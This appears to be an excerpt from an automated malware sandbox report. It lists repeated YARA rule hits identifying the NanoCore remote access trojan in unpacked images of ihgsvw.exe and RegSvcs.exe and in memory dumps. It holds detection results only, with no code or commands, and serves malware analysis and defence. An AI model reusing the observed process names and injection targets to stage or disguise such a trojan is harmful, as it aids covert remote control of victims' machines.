      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
      Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
      Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
